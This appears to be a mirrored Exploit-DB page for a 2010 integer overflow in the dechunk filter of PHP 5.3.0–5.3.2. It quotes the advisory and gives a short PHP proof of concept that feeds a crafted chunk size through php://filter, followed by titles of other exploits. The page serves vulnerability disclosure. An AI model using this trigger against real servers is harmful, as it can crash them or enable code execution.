PHP 5.3 – ‘PHP_dechunk()’ HTTP Chunked Encoding Integer Overflow

Exploit Database
244 阅读

作者： Stefan Esser

日期： 2010-05-02
类别：
- remote
平台：
- php
来源：https://www.exploit-db.com/exploits/33920/

source: https://www.securityfocus.com/bid/39877/info

PHP is prone to a remote integer-overflow vulnerability.

An attacker can exploit this issue to execute arbitrary code in the context of the PHP process. Failed exploit attempts will result in a denial-of-service condition.

PHP 5.3.0 through 5.3.2 are vulnerable; other versions may also be affected.

<?php

$x = '0fffffffe

XXX';

file_put_contents("file:///tmp/test.dat",$x);

$y = file_get_contents('php://filter/read=dechunk/resource=file:///tmp/test.dat');

echo "here";

last Exploits
PHP 5.3 – ‘PHP_dechunk()’ HTTP Chunked Encoding Integer Overflow的更多信息

Norton Core Secure WiFi Router – ‘BLE’ Command Injection (PoC)：
Quick TFTP Server Pro 2.1 – Transfer-Mode Overflow (Metasploit)：
Logsign 4.4.2/4.4.137 – Remote Command Injection (Metasploit)：
Solaris dtspcd – Remote Heap Overflow (Metasploit)：
McAfee Remediation Client – ActiveX Control Buffer Overflow (Metasploit)：
Tdarr 2.00.15 – Command Injection：
InterSystems Cache – UtilConfigHome.csp Argument Buffer Overflow (Metasploit)：
AoA Audio Extractor Basic 2.3.7 – ActiveX：